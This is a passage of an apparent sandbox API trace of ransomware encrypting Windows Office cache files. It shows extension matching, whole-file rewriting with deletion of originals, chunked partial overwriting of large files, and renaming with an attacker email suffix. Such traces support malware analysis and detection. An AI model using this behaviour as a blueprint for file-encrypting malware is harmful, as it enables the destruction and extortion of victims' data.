[0047.801] lstrlenW (lpString=".xlsx") returned 5 [0047.801] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.801] lstrlenW (lpString=".ppt") returned 4 [0047.801] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.801] lstrlenW (lpString=".zip") returned 4 [0047.801] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.801] lstrlenW (lpString=".rar") returned 4 [0047.801] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.801] lstrlenW (lpString=".bz2") returned 4 [0047.801] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.801] lstrlenW (lpString=".7z") returned 3 [0047.801] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.801] lstrlenW (lpString=".dbf") returned 4 [0047.801] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.802] lstrlenW (lpString=".1cd") returned 4 [0047.802] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.802] lstrlenW (lpString=".jpg") returned 4 [0047.802] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.802] lstrlenW (lpString=".doc") returned 4 [0047.802] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.802] lstrlenW (lpString=".docx") returned 5 [0047.802] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.802] lstrlenW (lpString=".pdf") returned 4 [0047.802] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.802] lstrlenW (lpString=".xls") returned 4 [0047.802] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.802] lstrlenW (lpString=".xlsx") returned 5 [0047.802] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.802] lstrlenW (lpString=".ppt") returned 4 [0047.802] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.802] lstrlenW (lpString=".zip") returned 4 [0047.802] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.802] lstrlenW (lpString=".rar") returned 4 [0047.802] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.802] lstrlenW (lpString=".bz2") returned 4 [0047.802] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.802] lstrlenW (lpString=".7z") returned 3 [0047.802] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.802] lstrlenW (lpString=".dbf") returned 4 [0047.802] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.803] lstrlenW (lpString=".1cd") returned 4 [0047.803] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.803] lstrlenW (lpString=".jpg") returned 4 [0047.803] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.803] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0047.803] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0047.803] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.803] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=868864) returned 1 [0047.803] CloseHandle (hObject=0x208) returned 1 [0047.803] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 0x2020 [0047.803] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.803] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.803] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.804] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.804] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.804] GetLastError () returned 0x0 [0047.804] ReadFile (in: hFile=0x208, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0047.934] WriteFile (in: hFile=0x200, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0048.036] ReadFile (in: hFile=0x208, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.036] WriteFile (in: hFile=0x200, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0048.037] SetEndOfFile (hFile=0x200) returned 1 [0048.037] CloseHandle (hObject=0x200) returned 1 [0048.037] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.037] SetEndOfFile (hFile=0x208) returned 1 [0048.044] CloseHandle (hObject=0x208) returned 1 [0048.044] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0048.045] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 1 [0048.045] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.045] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.045] lstrlenW (lpString=".doc") returned 4 [0048.045] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.045] lstrlenW (lpString=".docx") returned 5 [0048.045] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0048.045] lstrlenW (lpString=".pdf") returned 4 [0048.045] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.045] lstrlenW (lpString=".xls") returned 4 [0048.045] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.045] lstrlenW (lpString=".xlsx") returned 5 [0048.046] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0048.046] lstrlenW (lpString=".ppt") returned 4 [0048.046] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.046] lstrlenW (lpString=".zip") returned 4 [0048.046] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.046] lstrlenW (lpString=".rar") returned 4 [0048.046] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.046] lstrlenW (lpString=".bz2") returned 4 [0048.046] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.046] lstrlenW (lpString=".7z") returned 3 [0048.046] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.046] lstrlenW (lpString=".dbf") returned 4 [0048.046] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.046] lstrlenW (lpString=".1cd") returned 4 [0048.046] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.046] lstrlenW (lpString=".jpg") returned 4 [0048.046] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.046] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.046] lstrlenW (lpString=".doc") returned 4 [0048.046] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.046] lstrlenW (lpString=".docx") returned 5 [0048.046] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0048.046] lstrlenW (lpString=".pdf") returned 4 [0048.046] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.046] lstrlenW (lpString=".xls") returned 4 [0048.046] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.046] lstrlenW (lpString=".xlsx") returned 5 [0048.047] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0048.047] lstrlenW (lpString=".ppt") returned 4 [0048.047] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.047] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.047] lstrlenW (lpString=".zip") returned 4 [0048.047] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.047] lstrlenW (lpString=".rar") returned 4 [0048.047] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.047] lstrlenW (lpString=".bz2") returned 4 [0048.047] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.047] lstrlenW (lpString=".7z") returned 3 [0048.047] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.047] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.047] lstrlenW (lpString=".dbf") returned 4 [0048.047] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.047] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.047] lstrlenW (lpString=".1cd") returned 4 [0048.047] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.047] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0048.047] lstrlenW (lpString=".jpg") returned 4 [0048.047] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.047] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0048.047] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0048.047] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0048.048] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=36233052) returned 1 [0048.048] CloseHandle (hObject=0x208) returned 1 [0048.048] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0048.048] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.048] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0048.048] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0048.049] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.049] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.049] ReadFile (in: hFile=0x208, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.343] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.343] ReadFile (in: hFile=0x208, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.346] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.346] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.346] ReadFile (in: hFile=0x208, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.361] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.361] WriteFile (in: hFile=0x208, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0048.747] SetEndOfFile (hFile=0x208) returned 1 [0048.747] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0048.751] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.751] WriteFile (in: hFile=0x208, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.752] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.752] WriteFile (in: hFile=0x208, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.752] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.752] WriteFile (in: hFile=0x208, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.754] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0048.754] CloseHandle (hObject=0x208) returned 1 [0048.755] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0048.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.755] lstrlenW (lpString=".doc") returned 4 [0048.755] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.755] lstrlenW (lpString=".docx") returned 5 [0048.755] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.755] lstrlenW (lpString=".pdf") returned 4 [0048.755] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.755] lstrlenW (lpString=".xls") returned 4 [0048.755] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.755] lstrlenW (lpString=".xlsx") returned 5 [0048.755] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.755] lstrlenW (lpString=".ppt") returned 4 [0048.755] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.755] lstrlenW (lpString=".zip") returned 4 [0048.755] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.755] lstrlenW (lpString=".rar") returned 4 [0048.755] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.755] lstrlenW (lpString=".bz2") returned 4 [0048.755] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.755] lstrlenW (lpString=".7z") returned 3 [0048.755] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.756] lstrlenW (lpString=".dbf") returned 4 [0048.756] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.756] lstrlenW (lpString=".1cd") returned 4 [0048.756] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.756] lstrlenW (lpString=".jpg") returned 4 [0048.756] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.756] lstrlenW (lpString=".doc") returned 4 [0048.756] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.756] lstrlenW (lpString=".docx") returned 5 [0048.756] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.756] lstrlenW (lpString=".pdf") returned 4 [0048.756] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.756] lstrlenW (lpString=".xls") returned 4 [0048.756] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.756] lstrlenW (lpString=".xlsx") returned 5 [0048.756] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.756] lstrlenW (lpString=".ppt") returned 4 [0048.756] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.756] lstrlenW (lpString=".zip") returned 4 [0048.756] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.756] lstrlenW (lpString=".rar") returned 4 [0048.756] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.756] lstrlenW (lpString=".bz2") returned 4 [0048.756] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.756] lstrlenW (lpString=".7z") returned 3 [0048.756] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.756] lstrlenW (lpString=".dbf") returned 4 [0048.756] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.757] lstrlenW (lpString=".1cd") returned 4 [0048.757] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0048.757] lstrlenW (lpString=".jpg") returned 4 [0048.757] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.757] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0048.757] lstrlenW (lpString="ProPrWW2.cab") returned 12 [0048.757] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0048.757] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=222948913) returned 1 [0048.757] CloseHandle (hObject=0x208) returned 1 [0048.757] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab")) returned 0x2020 [0048.757] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.757] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0048.758] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0048.758] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.758] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.758] ReadFile (in: hFile=0x208, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, 